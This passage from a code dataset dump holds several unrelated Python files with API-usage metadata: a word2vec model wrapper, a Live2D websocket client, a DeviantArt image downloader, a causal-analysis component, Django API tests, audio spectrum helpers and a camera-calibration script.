"usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 189, 
"usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 195, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 196, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 202, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 203, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 209, "usage_type": "call"}, {"api_name": "dash_html_components.H6", "line_number": 211, "usage_type": "call"}, {"api_name": "dash_html_components.Table", "line_number": 212, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 237, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 239, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 241, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 231, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 232, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 253, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 255, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 257, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 247, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 248, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 269, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 270, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 272, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 263, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 264, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 284, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 286, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 287, "usage_type": "call"}, {"api_name": "dash_html_components.Table", "line_number": 291, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 293, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 295, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 296, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 299, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 301, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 302, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 305, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 307, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 308, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 278, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 279, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 325, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 326, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 328, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 319, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 320, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 339, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 340, 
"usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 334, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 335, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 353, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 354, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 348, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 349, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 369, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 371, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 374, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 376, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 382, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 384, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 389, "usage_type": "call"}, {"api_name": "pandas.Series.to_frame", "line_number": 390, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 390, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 394, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 423, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 423, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 362, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 363, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 364, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 365, "usage_type": "call"}]} +{"seq_id": "37099698498", "text": "\"\"\"\nSince 6.11.2019 we do not use gensim so this is deprecated.\nIt is not deleted because of possibility of returning to this idea.\n\"\"\"\n\nimport os\nimport numpy as np\nimport gensim\nfrom deprecated import deprecated\nfrom scipy.spatial import distance\nfrom settings import DATA_PATH\nfrom tqdm import tqdm\n\n@deprecated(reason=\"Class is not finished because it is hard to convert dict to gensim.\")\nclass IpiPanModelGensim():\n \"\"\"\n DATA_PATH/models directory should contains saved models.\n Models are available to download on http://dsmodels.nlp.ipipan.waw.pl/.\n\n In contrast to IpiPanModel, this class requires binary Word2Vec binary models.\n\n Naming convention from IPI-PAN docs:\n Nazwa pliku: corpus-type-stype-dim-arch-alg.txt.gz\n corpus nazwa korpusu - nkjp, wiki lub nkjp+wiki\n type typ modelu - model oparty na formach (forms) lub lematach (lemmas)\n stype podtyp modelu - wszystkie części mowy (all) lub tylko wybrane części mowy (restricted)\n dim rozmiar wektora - 100 lub 300\n arch architektura sieci neuronowej - CBOW (cbow) lub Skip-Gram (skipg)\n alg algorytm uczący - Hierarchical Softmax (hs) lub Negative Sampling (ns)\n\n Niektóre modele ograniczone zostały tylko do tych słów, które wystąpiły co najmniej 30 lub 50 razy w korpusie.\n Jest to zaznaczone po nazwie algorytmu uczącego alg. 
it100 in the file name means that the model was\n    trained in one hundred iterations.\n    \"\"\"\n    def __init__(self, file_name):\n        self.model = None\n        self.load_model(file_name)\n\n    def load_model(self, file_name):\n        file_extension = os.path.splitext(file_name)[1]\n        if file_extension == '.txt':\n            self.load_model_from_raw_file(file_name)\n        else:\n            self.load_model_from_binary(file_name)\n\n    def load_model_from_binary(self, file_name):\n        file_path = os.path.join(DATA_PATH, os.path.join(\"models\", file_name))\n        if not os.path.isfile(file_path):\n            raise ValueError(\"File {} does not exist.\".format(file_path))\n        self.model = gensim.models.KeyedVectors.load_word2vec_format(file_path, binary=True)\n\n    def load_model_from_raw_file(self, file_name):\n        self.load_raw_file(file_name)\n        # embeddings = self.filter_model_with_polimorf(embeddings)\n        print(len(self.word2vec_embeddings.keys()))\n        self.model = gensim.models.keyedvectors.Word2VecKeyedVectors(len(self.word2vec_embeddings.keys()))\n        self.model.vocab = self.word2vec_embeddings\n        vectors = np.array(self.word2vec_embeddings.values())\n        print(type(vectors))\n        print(vectors.shape)\n        self.model.vectors = vectors\n\n    def load_raw_file(self, file_name):\n        self.word2vec_embeddings = dict()\n        file_path = os.path.join(DATA_PATH, os.path.join(\"models\", file_name))\n        if not os.path.isfile(file_path):\n            raise ValueError(\"File {} does not exist.\".format(file_path))\n        f = open(file_path, \"r\")\n        for x in f:\n            x = x.replace(\"\\r\\n\", \"\\n\").replace(\"\\n\", \"\")\n            x = x.split(\" \")\n            if len(x) > 2: # skip first line\n                self.word2vec_embeddings[x[0]] = np.array(x[1:], dtype=float)\n\n    def filter_model_with_polimorf(self):\n        vocabulary = self._get_vocabulary_from_polimorf()\n        new_word2vec_dictionary = dict()\n        print(\"Number of words in Word2Vec: {}\".format(len(self.word2vec_embeddings.keys())))\n        for word, embedding in tqdm(self.word2vec_embeddings.items()):\n            if word in vocabulary:\n                new_word2vec_dictionary[word] = embedding\n        return new_word2vec_dictionary\n\n    def _get_vocabulary_from_polimorf(self):\n        vocabulary = list()\n        with open(os.path.join(DATA_PATH, \"PoliMorf-0.6.7.tab\"), 'r') as file:\n            lines = file.readlines()\n            for line in lines:\n                words = line.split(\"\\t\")\n                vocabulary.append(words[0])\n        return vocabulary\n\n    def get(self, word):\n        \"\"\"\n        Return embedding for a word.\n        :param word:\n        :return: numpy.ndarray with word embedding\n        \"\"\"\n        try:\n            ret_val = self.model.get_vector(word)\n        except:\n            raise ValueError(\"Word {} is not available in model.\".format(word))\n        return ret_val\n\n    def semantic_relatedness(self, word1, word2, dist_type='cosine'):\n        v1 = self.get(word1)\n        v2 = self.get(word2)\n        dist_fun = self.__get_distance_function(dist_type)\n        return dist_fun(v1, v2)\n\n    def synonyms(self, word, top=10, dist_type='cosine'):\n        dist_fun = self.__get_distance_function(dist_type)\n        distances = {}\n        for neighbour in self.model.vocab:\n            distances[neighbour] = dist_fun(self.get(word), self.get(neighbour))\n        sorted_dist = sorted(distances.items(), key=lambda kv: kv[1])\n        closest = [sd[0] for sd in sorted_dist[:top]]\n        return closest\n\n    def __get_distance_function(self, dist_type='cosine'):\n        if dist_type == 'euclidean':\n            return distance.euclidean\n        elif dist_type == 'manhattan':\n            return distance.cityblock\n        elif dist_type == \"cosine\":\n            return distance.cosine\n\n    def save_model(self, file_name):\n        print(type(self.model.vocab))\n        print(self.model.vectors.shape)\n        file_path = os.path.join(DATA_PATH, file_name + \".bin\")\n        
self.model.save_word2vec_format(file_path, binary=True)\n\n", "repo_name": "lukaszsus/nlp-semantic-relatedness", "sub_path": "models/ipi_pan_model_gensim.py", "file_name": "ipi_pan_model_gensim.py", "file_ext": "py", "file_size_in_byte": 5553, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.splitext", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "settings.DATA_PATH", "line_number": 47, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 50, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 50, "usage_type": "attribute"}, {"api_name": "gensim.models.keyedvectors.Word2VecKeyedVectors", "line_number": 56, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "settings.DATA_PATH", "line_number": 65, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "settings.DATA_PATH", "line_number": 86, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance.euclidean", "line_number": 122, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance", "line_number": 122, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cityblock", "line_number": 124, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance", "line_number": 124, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 126, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "settings.DATA_PATH", "line_number": 131, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "deprecated.deprecated", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "44187931888", "text": "import asyncio\r\nimport tkinter as tk\r\nimport json\r\nimport websockets\r\nimport threading\r\nimport time\r\n\r\nclass Simple:\r\n    def __init__(self):\r\n        try:\r\n            self.websocket = None\r\n            self.i=0\r\n            self.loop = asyncio.new_event_loop()\r\n            asyncio.set_event_loop(self.loop)\r\n            self.start_connect()\r\n        except Exception:\r\n            print(\"live2d is not running\")\r\n            raise OSError\r\n\r\n\r\n    async def connect(self):\r\n        uri = \"ws://127.0.0.1:10086/api\"\r\n        async with websockets.connect(uri) as websocket:\r\n            self.websocket = websocket\r\n            msg = {\"msg\": 10000, \"msgId\": 1}\r\n            await self.websocket.send(json.dumps(msg))\r\n            
print(\"***连接中***\")\r\n while True:\r\n response = await self.websocket.recv()\r\n if isinstance(response, str):\r\n response = json.loads(response)\r\n msg_value = response.get('msg', None)\r\n if msg_value == 10000:\r\n print(\"***连接成功***\")\r\n self.i=1\r\n print(self.i)\r\n else:\r\n print(response)\r\n\r\n def start_connect(self):\r\n def target():\r\n try:\r\n self.loop.run_until_complete(self.connect())\r\n\r\n except Exception:\r\n print(\"未开启live2d\")\r\n pass\r\n threading.Thread(target=target).start()\r\n\r\n\r\n\r\n\r\n async def send_message(self,text):\r\n msg1 = {\r\n \"msg\": 11000,\r\n \"msgId\": 1,\r\n \"data\": {\r\n \"id\": 0,\r\n \"text\": str(text),\r\n \"textFrameColor\": 0x000000,\r\n \"textColor\": 0xFFFFFF,\r\n \"duration\": 600000,\r\n }\r\n }\r\n msg2 = {\r\n \"msg\": 13200,\r\n \"msgId\": 1,\r\n \"data\": {\r\n \"id\": 0,\r\n \"type\": 0,\r\n \"mtn\": \"talk#3\"\r\n }\r\n }\r\n await self.websocket.send(json.dumps(msg1))\r\n print(\"发送消息\")\r\n await self.websocket.send(json.dumps(msg2))\r\n print(\"更改表情\")\r\n\r\n def call_send_message(self, text):\r\n while True:\r\n if self.i == 1:\r\n asyncio.run(self.send_message(text))\r\n break\r\n\r\n#chat2d=Simple()\r\n#chat2d.call_send_message(\"你好\")", "repo_name": "hz3271/gptchatpet", "sub_path": "call_live2d.py", "file_name": "call_live2d.py", "file_ext": "py", "file_size_in_byte": 2432, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "asyncio.new_event_loop", "line_number": 13, "usage_type": "call"}, {"api_name": "asyncio.set_event_loop", "line_number": 14, "usage_type": "call"}, {"api_name": "websockets.connect", "line_number": 23, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 48, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 74, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 76, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "73181860004", "text": "import argparse\nimport json\nimport logging\n\nfrom pathlib import Path\nfrom shutil import copyfile\n\nfrom responsibleai import RAIInsights\n\n\nfrom constants import RAIToolType, DashboardInfo\nfrom rai_component_utilities import (\n load_rai_insights_from_input_port,\n save_to_output_port,\n copy_dashboard_info_file,\n)\nfrom arg_helpers import (\n float_or_json_parser,\n boolean_parser,\n str_or_list_parser,\n int_or_none_parser,\n)\n\n_logger = logging.getLogger(__file__)\nlogging.basicConfig(level=logging.INFO)\n\n\ndef parse_args():\n # setup arg parser\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--rai_insights_dashboard\", type=str, required=True)\n\n parser.add_argument(\"--treatment_features\", type=json.loads, help=\"List[str]\")\n parser.add_argument(\n \"--heterogeneity_features\",\n type=json.loads,\n help=\"Optional[List[str]] use 'null' to skip\",\n )\n parser.add_argument(\"--nuisance_model\", type=str)\n parser.add_argument(\"--heterogeneity_model\", type=str)\n parser.add_argument(\"--alpha\", type=float)\n parser.add_argument(\"--upper_bound_on_cat_expansion\", type=int)\n parser.add_argument(\n \"--treatment_cost\",\n type=float_or_json_parser,\n help=\"Union[float, List[Union[float, np.ndarray]]]\",\n )\n parser.add_argument(\"--min_tree_leaf_samples\", type=int)\n 
parser.add_argument(\"--max_tree_depth\", type=int)\n parser.add_argument(\"--skip_cat_limit_checks\", type=boolean_parser)\n parser.add_argument(\"--categories\", type=str_or_list_parser)\n parser.add_argument(\"--n_jobs\", type=int)\n parser.add_argument(\"--verbose\", type=int)\n parser.add_argument(\"--random_state\", type=int_or_none_parser)\n\n parser.add_argument(\"--causal_path\", type=str)\n\n # parse args\n args = parser.parse_args()\n\n # return args\n return args\n\n\ndef main(args):\n # Load the RAI Insights object\n rai_i: RAIInsights = load_rai_insights_from_input_port(args.rai_insights_dashboard)\n\n # Add the causal analysis\n rai_i.causal.add(\n treatment_features=args.treatment_features,\n heterogeneity_features=args.heterogeneity_features,\n nuisance_model=args.nuisance_model,\n heterogeneity_model=args.heterogeneity_model,\n alpha=args.alpha,\n upper_bound_on_cat_expansion=args.upper_bound_on_cat_expansion,\n treatment_cost=args.treatment_cost,\n min_tree_leaf_samples=args.min_tree_leaf_samples,\n max_tree_depth=args.max_tree_depth,\n skip_cat_limit_checks=args.skip_cat_limit_checks,\n categories=args.categories,\n n_jobs=args.n_jobs,\n verbose=args.verbose,\n random_state=args.random_state,\n )\n _logger.info(\"Added causal\")\n\n # Compute\n rai_i.compute()\n _logger.info(\"Computation complete\")\n\n # Save\n save_to_output_port(rai_i, args.causal_path, RAIToolType.CAUSAL)\n _logger.info(\"Saved computation to output port\")\n\n # Copy the dashboard info file\n copy_dashboard_info_file(args.rai_insights_dashboard, args.causal_path)\n\n _logger.info(\"Completing\")\n\n\n# run script\nif __name__ == \"__main__\":\n # add space in logs\n print(\"*\" * 60)\n print(\"\\n\\n\")\n\n # parse args\n args = parse_args()\n\n # run main function\n main(args)\n\n # add space in logs\n print(\"*\" * 60)\n print(\"\\n\\n\")\n", "repo_name": "Azure/AutoML-vNext-Preview", "sub_path": "src/responsibleai/rai_analyse/create_causal.py", "file_name": "create_causal.py", "file_ext": "py", "file_size_in_byte": 3326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 25, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 30, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 37, "usage_type": "attribute"}, {"api_name": "arg_helpers.float_or_json_parser", "line_number": 46, "usage_type": "name"}, {"api_name": "arg_helpers.boolean_parser", "line_number": 51, "usage_type": "name"}, {"api_name": "arg_helpers.str_or_list_parser", "line_number": 52, "usage_type": "name"}, {"api_name": "arg_helpers.int_or_none_parser", "line_number": 55, "usage_type": "name"}, {"api_name": "responsibleai.RAIInsights", "line_number": 68, "usage_type": "name"}, {"api_name": "rai_component_utilities.load_rai_insights_from_input_port", "line_number": 68, "usage_type": "call"}, {"api_name": "rai_component_utilities.save_to_output_port", "line_number": 94, "usage_type": "call"}, {"api_name": "constants.RAIToolType.CAUSAL", "line_number": 94, "usage_type": "attribute"}, {"api_name": "constants.RAIToolType", "line_number": 94, "usage_type": "name"}, {"api_name": "rai_component_utilities.copy_dashboard_info_file", "line_number": 98, 
"usage_type": "call"}]} +{"seq_id": "72132833124", "text": "#!/usr/bin/env python\n\nimport requests, os, shutil, subprocess\n\nauth_url = 'https://www.deviantart.com/oauth2/token'\n\nauth_post_body = {\n 'grant_type': 'client_credentials',\n 'client_id': os.environ['CLIENT_ID'],\n 'client_secret': os.environ['CLIENT_SECRET']\n}\n\nauth_json = requests.post(auth_url, auth_post_body).json()\naccess_token = auth_json['access_token']\n\ndd_url = 'https://www.deviantart.com/api/v1/oauth2/browse/dailydeviations?access_token=' + access_token\ndd_json = requests.get(dd_url).json()\n\nif os.path.exists('./deviations'):\n shutil.rmtree('./deviations')\nos.mkdir('./deviations')\n\nfile_count = 0\n\nfor deviation in dd_json['results']:\n if 'content' in deviation:\n image = requests.get(deviation['content']['src'])\n filename = './deviations/' + str(file_count) + '.jpg'\n open(filename, 'wb').write(image.content)\n file_count += 1\n\nsubprocess.run('fbi -noverbose -a -t 10 ./deviations/*.jpg', shell=True)\n", "repo_name": "ericsolomon/dds", "sub_path": "dds.py", "file_name": "dds.py", "file_ext": "py", "file_size_in_byte": 962, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 20, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 27, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "23744179367", "text": "import pytest\nfrom django.urls import reverse\nfrom rest_framework import status\n\nfrom goals.serializers import GoalCategorySerializer\n\n\n@pytest.mark.django_db\nclass TestCategoriesList:\n url = reverse('goals:list_of_categories')\n\n def test_get_list(self, auth_client, board, category_factory):\n board, category = board\n categories = category_factory.create_batch(2, board=board)\n\n response = auth_client.get(self.url)\n\n assert response.status_code == status.HTTP_200_OK\n for cat in GoalCategorySerializer(categories, many=True).data:\n assert cat in response.data\n\n def test_can_not_get_list_from_an_alien_board(self, auth_client, alien_board,\n category_factory):\n board, _ = alien_board\n category_factory.create_batch(2, board=board)\n\n response = auth_client.get(self.url)\n\n assert response.data == []\n\n def test_get_list_from_an_alien_board_as_a_writer(self, auth_client, alien_board_writer,\n category_factory):\n board, _ = alien_board_writer\n categories = category_factory.create_batch(2, board=board)\n\n response = auth_client.get(self.url)\n\n assert response.status_code == status.HTTP_200_OK\n for cat in GoalCategorySerializer(categories, many=True).data:\n assert cat in response.data\n\n def test_get_list_from_an_alien_board_as_a_reader(self, auth_client, alien_board_reader,\n category_factory):\n board, _ = alien_board_reader\n categories = category_factory.create_batch(2, board=board)\n\n response = auth_client.get(self.url)\n\n assert response.status_code == status.HTTP_200_OK\n for cat in 
GoalCategorySerializer(categories, many=True).data:\n assert cat in response.data\n\n def test_get_list_unauthorized(self, client):\n response = client.get(self.url)\n\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_pagination(self, auth_client, board, category_factory):\n board, _ = board\n category_factory.create_batch(15, board=board)\n\n limit_response = auth_client.get(self.url, {'limit': 5})\n\n assert limit_response.status_code == status.HTTP_200_OK\n assert limit_response.json()['count'] == 16\n assert len(limit_response.json()['results']) == 5\n\n offset_response = auth_client.get(self.url, {'limit': 15, 'offset': 5})\n\n assert offset_response.status_code == status.HTTP_200_OK\n assert offset_response.json()['count'] == 16\n assert len(offset_response.json()['results']) == 11\n\n def test_ordering_by_title(self, auth_client, category_factory, board):\n board, category = board\n category.title = 'Test'\n category.save()\n for title in ['Test title', 'Title', 'New title']:\n category_factory.create(title=title, board=board)\n\n response = auth_client.get(self.url)\n assert response.status_code == status.HTTP_200_OK\n assert [goal['title'] for goal in response.json()] == ['New title', 'Test', 'Test title', 'Title']\n", "repo_name": "Alstacon/ToDoCon", "sub_path": "tests/goals/category/test_categories_list.py", "file_name": "test_categories_list.py", "file_ext": "py", "file_size_in_byte": 3214, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.reverse", "line_number": 10, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 18, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 18, "usage_type": "name"}, {"api_name": "goals.serializers.GoalCategorySerializer", "line_number": 19, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 38, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 38, "usage_type": "name"}, {"api_name": "goals.serializers.GoalCategorySerializer", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 49, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 49, "usage_type": "name"}, {"api_name": "goals.serializers.GoalCategorySerializer", "line_number": 50, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 56, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 64, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 64, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 70, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 70, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 82, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 82, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 8, "usage_type": "attribute"}]} +{"seq_id": "24962835357", "text": "import librosa\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef load_audio_file(file_path, sample_rate = 16000):\n signal, sr = librosa.load(file_path, sr=sample_rate)\n return signal, sr\n\ndef compute_fft(signal, sample_rate = 16000):\n 
fft_result= np.fft.fft(signal)\n frequencies = np.fft.fftfreq(len(signal), 1.0/sample_rate)\n frequencies = frequencies[:int(len(frequencies)/2)] \n fft_result = fft_result[:int(len(fft_result)/2)]\n return frequencies, fft_result\n\ndef compute_power_spectrum(signal, sample_rate = 16000):\n frequencies, fft_result = compute_fft(signal, sample_rate)\n power_spectrum = np.abs(fft_result)**2 / len(signal)\n return frequencies, power_spectrum\n\ndef plot_power_spectrum(signal, sample_rate = 16000):\n frequencies, power_spectrum = compute_power_spectrum(signal, sample_rate)\n plt.ion()\n plt.clf()\n plt.plot(frequencies, power_spectrum)\n plt.xlabel('Frequency (Hz)')\n plt.ylabel('Power')\n plt.grid(alpha=0.3)\n plt.show()\n\ndef frequency_band_to_db(freq_lower_bound, freq_upper_band, frequencies, power_spectrum,\n baseline_power = 10**-12):\n lower_index = np.where(frequencies >= freq_lower_bound)[0][0]\n upper_index = np.where(frequencies <= freq_upper_band)[0][-1]\n power = np.sum(power_spectrum[lower_index:upper_index])\n return 10 * np.log10(power / baseline_power)\n", "repo_name": "martijnbentum/E2ELD-cautious-fiesta", "sub_path": "frequency_band.py", "file_name": "frequency_band.py", "file_ext": "py", "file_size_in_byte": 1367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "librosa.load", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.fft.fftfreq", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "23174184419", "text": "import numpy as np\nimport glob\nimport cv2\nimport pickle\n\n#prepare object points\nobjp = np.zeros((6*9,3), np.float32)\nobjp[:,:2] = np.mgrid[0:9,0:6].T.reshape(-1,2)\n\nobjpoints = []\nimgpoints = []\n\n# Fetch a bunch of images for calibration\nimages = glob.glob('./camera_cal/calibration*.jpg')\n\n# Process each image\nfor idx, 
